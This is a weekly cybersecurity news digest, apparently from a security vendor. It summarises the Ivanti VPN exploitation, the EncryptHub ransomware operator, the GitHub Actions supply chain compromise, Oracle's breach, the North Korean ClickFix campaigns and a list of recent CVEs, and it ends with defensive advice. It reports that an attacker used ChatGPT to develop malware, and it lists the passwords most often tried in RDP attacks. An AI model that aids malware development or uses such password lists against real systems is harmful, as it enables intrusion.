Cybersecurity Weekly Digest: VPN Exploits, Oracle’s Silent Breach, and ClickFix Surge

The cybersecurity landscape continues to evolve at a rapid pace, with threat actors constantly finding new ways to exploit vulnerabilities in systems, applications, and human psychology. This week’s security developments highlight the critical importance of timely patching, robust supply chain security, and vigilant monitoring of system access. From sophisticated nation-state operations to lone-wolf threat actors, the diversity of cyber threats demands a comprehensive security approach.

Major Threat Alert: UNC5221 Exploits Ivanti VPN Vulnerability

A China-linked cyber espionage group tracked as UNC5221 (also known as APT27, Silk Typhoon, and UTA0178) has been observed exploiting a critical vulnerability in Ivanti Connect Secure VPN. The flaw, identified as CVE-2025-22457 with a CVSS score of 9.0, allows attackers to deploy sophisticated malware payloads including:

• TRAILBLAZE – An in-memory dropper designed to evade detection
• BRUSHFIRE – A passive backdoor providing persistent access
• SPAWN – A comprehensive malware suite with extensive capabilities

What makes this attack particularly concerning is that the threat actors appear to have reverse-engineered Ivanti’s February 11 patch to develop their exploit, targeting organizations that delayed implementing the critical security update.

This incident underscores the importance of implementing a comprehensive router and VPN security strategy to protect against network-level threats that could compromise your entire infrastructure.

EncryptHub Ransomware Operator Unmasked

In a surprising development, the threat actor behind the emerging EncryptHub ransomware has been identified as likely operating alone, following a series of operational security mistakes. What makes this case particularly intriguing is the attacker’s dual life – contributing to legitimate security research while simultaneously conducting malicious campaigns.

The individual recently received acknowledgment from the Microsoft Security Response Center for discovering and reporting two vulnerabilities:

• CVE-2025-24061
• CVE-2025-2407

Even more unusual is the threat actor’s reliance on OpenAI’s ChatGPT for malware development, translation tasks, and even cybercriminal career guidance. In particularly revealing conversations, EncryptHub asked the AI to evaluate whether they were better suited to be a “black hat or white hat” hacker, or if they should become “a cool hacker or a malicious researcher” – even confessing to criminal activities and developed exploits.

As security firm Outpost24 noted, “When people think of cybercriminals, they tend to imagine high-tech, government-backed teams and elite hackers using cutting-edge technology. However, many hackers are normal people who at some point decided to follow a dark path.”

For more detailed analysis of the EncryptHub operation and technical indicators of compromise, check our comprehensive EncryptHub ransomware report.

Complex GitHub Supply Chain Attack Traced to SpotBugs PAT Theft

The recent GitHub Action supply chain attack that initially targeted Coinbase has been traced back to the theft of a personal access token (PAT) associated with the open-source SpotBugs project. This sophisticated multi-stage attack demonstrates the complex interconnectivity of the modern software supply chain:

1. SpotBugs was initially compromised in November 2024
2. Attackers used this access to compromise “reviewdog/action-setup”
3. This access was leveraged to infect “tj-actions/changed-files”
4. The compromised action exposed secrets in 218 repositories

The attack’s complexity stemmed from the fact that the maintainer of reviewdog also had access to SpotBugs repositories, creating a chain of trust that attackers exploited to move laterally across projects. This incident highlights the importance of securing developer tokens and implementing proper access controls in development environments.

Oracle’s Silent Breach Privately Confirmed

Enterprise computing giant Oracle is privately informing customers of a significant data breach affecting a “legacy” Oracle environment, despite consistent public denials. According to reports, hackers compromised Oracle systems, exposing usernames, passkeys, and encrypted passwords.

What makes this incident particularly concerning:

• Oracle has claimed to customers that the system hasn’t been in use for eight years and poses minimal risk
• The FBI and CrowdStrike are actively investigating the incident
• This is the second breach Oracle has acknowledged to clients in recent weeks
• The breach is separate from another hack at Oracle Health (formerly Cerner) that affected US healthcare customers last month

Multiple cybersecurity firms including Black Kite, CloudSEK, CyberAngel, Hudson Rock, Orca Security, SOCRadar, Sygnia, and Trustwave have analyzed and validated the data posted for sale online as directly extracted from Oracle.

Technical details indicate the attacker likely exploited an unpatched vulnerability in Oracle Fusion Middleware (CVE-2021-35587) to compromise Oracle Cloud’s login and authentication system. According to CyberAngel, “This exposure was facilitated via a 2020 Java exploit and the hacker was able to install a web shell along with malware. The malware specifically targeted the Oracle IDM database and was able to exfil data.”

Security researcher Kevin Beaumont noted that “Oracle are attempting to wordsmith statements around Oracle Cloud and use very specific words to avoid responsibility,” adding that “Oracle rebadged old Oracle Cloud services to be Oracle Classic. Oracle Classic has the security incident. Oracle are denying it on ‘Oracle Cloud’ by using this scope — but it’s still Oracle cloud services that Oracle manage. That’s part of the wordplay.”

This situation highlights the importance of taking data breaches seriously and responding with transparency rather than obfuscation.

North Korean Threat Actors Adopt ClickFix for GolangGhost Delivery

The North Korean threat group behind the ongoing Contagious Interview campaign has expanded their tactics to include the ClickFix social engineering technique, which helps bypass security protections by tricking users into making specific mouse actions. This campaign now delivers a previously undocumented backdoor called GolangGhost.

Additionally, the group has published 11 malicious npm packages that deliver:

• BeaverTail information stealer malware
• A new remote access trojan (RAT) loader

These packages were downloaded more than 5,600 times before being removed from the npm registry. The campaign appears to be shifting focus from U.S. targets to European organizations, with North Korean IT workers expanding their fraudulent employment schemes globally.

Google researchers observed these actors “engaging in a pattern of providing fabricated references, building a rapport with job recruiters, and using additional personas they controlled to vouch for their credibility.” More concerning, these actors are increasingly attempting to extort money from companies once they are discovered and fired.

The U.S. government has been working to raise awareness about this insider threat operation, targeting U.S.-based facilitators of the fraudulent scheme and uncovering the IT workers and front companies that help conceal their true origin. This enforcement pressure has likely caused the operators to focus on targets outside the US and adopt more aggressive revenue measures.

ClickFix has seen a significant surge in popularity among various threat actors. Recently, it has also been observed being used to deliver the previously dormant QakBot malware. The technique involves tricking victims into running malicious commands under the pretext of fixing issues, typically disguised as CAPTCHA verification challenges.

This growing threat is similar to other sophisticated RAT deployments that we’ve analyzed, including the Triton RAT malware and Lilith RAT campaigns.

Additional Security Developments

Counterfeit Android Phones Pre-loaded with Triada Malware

Investigators have discovered counterfeit versions of popular Android smartphone models being sold at reduced prices with pre-installed Triada malware. Most infections have been reported in Russia, suggesting a hardware supply chain compromise specifically targeting this region. This malware has previously spread through unofficial WhatsApp modifications and third-party app stores.

For comprehensive protection against Android malware and other threats, refer to our malware removal comprehensive guide.

WordPress mu-plugins Directory Abuse

Threat actors are increasingly targeting the WordPress mu-plugins (“must-use plugins”) directory to stealthily run malicious code. Because these plugins run automatically on every page load and don’t appear in the standard plugin list, they provide an ideal hiding place for persistent malicious code that can:

• Steal credentials
• Inject malicious code
• Alter HTML output
• Execute arbitrary commands

Most Common Passwords in RDP Attacks

Recent analysis of 15 million passwords used in Remote Desktop Protocol (RDP) attacks revealed the most common credentials that attackers try when conducting brute force or password spraying attacks:

1. 123456
2. 1234
3. Password1
4. 12345
5. P@sswOrd
6. password
7. Password123
8. Welcome1
9. 12345678
10. Aa123456

This data highlights the critical importance of implementing strong password policies, especially for remote access services that are directly exposed to the internet.

Cybersecurity Tip of the Week: Track First-Time Connections

One of the most effective ways to detect threats early is by monitoring first-time connections to critical systems. Most attackers leave their initial trace not through malware, but when they first access your systems from new IPs, devices, or locations.

Implement these practices to enhance your security posture:

• Focus monitoring on critical systems: VPNs, admin portals, cloud dashboards, and service accounts
• Utilize free tools like Wazuh, OSQuery, or Graylog to detect new devices and unfamiliar connections
• Create baselines of known users, IPs, and devices, then flag anything new
• Set up alerts for suspicious scenarios, such as admin accounts logging in from new countries
• Consider deploying honeytokens (fake credentials) to catch intruders probing your network

Remember: Attackers can steal credentials, bypass MFA, or hide malware, but they can’t fake having never connected before.

Weekly Security Recommendations

Based on this week’s developments, we recommend implementing these security measures:

1. Patch VPN and Remote Access Systems: Immediately apply updates for Ivanti Connect Secure and other remote access solutions
2. Review CI/CD Security: Audit access to GitHub Actions and other CI/CD components, implementing least privilege access principles
3. Strengthen Authentication: Implement strong, unique passwords and multi-factor authentication for all remote access
4. Monitor for Anomalous Behaviors: Set up alerting for first-time connections and unexpected access patterns
5. Verify Software Integrity: Implement software supply chain verification for all installed components

For comprehensive threat mitigation, consider using specialized security solutions like Trojan Killer to detect and remove sophisticated malware that might evade traditional security tools.

Trending CVEs This Week

Security vulnerabilities continue to be prime targets for attackers seeking entry points into systems. This week’s critical CVEs that security teams should address immediately include:

CVE ID	Affected Product	Severity
CVE-2025-22457	Ivanti Connect Secure, Policy Secure, and ZTA Gateway	9.0 (Critical)
CVE-2025-30065	Apache Parquet	8.8 (High)
CVE-2024-10668	Google Quick Share for Windows	8.8 (High)
CVE-2025-24362	github/codeql-action	8.8 (High)
CVE-2025-1268	Canon	8.5 (High)
CVE-2025-1449	Rockwell Automation Verve Asset Manager	9.8 (Critical)
CVE-2025-2008	WP Ultimate CSV Importer plugin	9.8 (Critical)
CVE-2024-3660	TensorFlow Keras	7.8 (High)

Other notable vulnerabilities include CVE-2025-20139 (Cisco Enterprise Chat and Email), CVE-2025-20212 (Cisco AnyConnect VPN server of Cisco Meraki MX and Z Series), CVE-2025-27520 (BentoML), and several WordPress plugin vulnerabilities including CVE-2025-2798 (Woffice CRM theme).

For protection against WordPress vulnerabilities and malicious plugins, refer to our guide on comprehensive malware removal strategies which includes specific WordPress security recommendations.

Conclusion

This week’s security developments highlight a crucial reality in cybersecurity: the threats that cause the most damage are often the ones that go undetected until it’s too late. From sophisticated state-sponsored attacks exploiting VPN vulnerabilities to lone actors developing ransomware with AI assistance, the threat landscape continues to evolve in complexity and scale.

Organizations must focus on fundamental security practices: timely patching, proper access controls, monitoring of first-time connections, and comprehensive supply chain security. As attackers continue to exploit both technical vulnerabilities and human psychology, a multi-layered defense strategy remains essential.

Stay vigilant, stay informed, and remember that in cybersecurity, prevention is always more effective than remediation.